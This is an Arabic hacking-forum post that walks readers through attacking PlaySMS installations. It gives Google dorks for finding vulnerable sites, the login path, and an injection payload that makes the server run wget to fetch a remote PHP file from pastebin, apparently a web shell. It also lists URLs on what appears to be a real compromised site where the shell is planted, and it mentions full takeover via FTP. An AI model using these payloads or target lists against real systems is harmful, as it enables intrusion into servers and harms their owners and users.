Subject İnformation
Author هكركوز الكويت Replies 1
Share Views 403
  • 0 أصوات - بمعدل 0
  • 1
  • 2
  • 3
  • 4
  • 5
ثغره PlaySMS
#1
# Google Dork :
- inurl:?app=main intitleConfusedms
- inurl:?app=main intext:"recover password"

باختصار لـ PlaySMS
https://playsms.org/
الاضافه بعد الموقع
index.php?app=main&inc=core_auth&route=login
ضع بس هذا الكود
{{`wget https://pastebin.com/raw/YH2SJenM -O linuxploit.php`}}
بعدها تمسح الرابط بوضع الموقع المستهدف بمثال وتضيف linuxploit.php
http://www.dozp.pl/playsms/linuxploit.php
راح تجد مركز التحميل : ويمكنك بعض الاحيان تقدر تعدل في الصلاحيات ويمكنك تسيطر على الموقع بشامل باستخدام الاف تي بي
http://www.dozp.pl/ampache/daap/
http://www.dozp.pl/playsms/ShEll-webadmin.php
خليتها لكم لمشاهده Smile
الرد
#2
ممكن تعيد الشرح
الرد



يقوم بقرائة الموضوع:
بالاضافة الى ( 1 ) ضيف كريم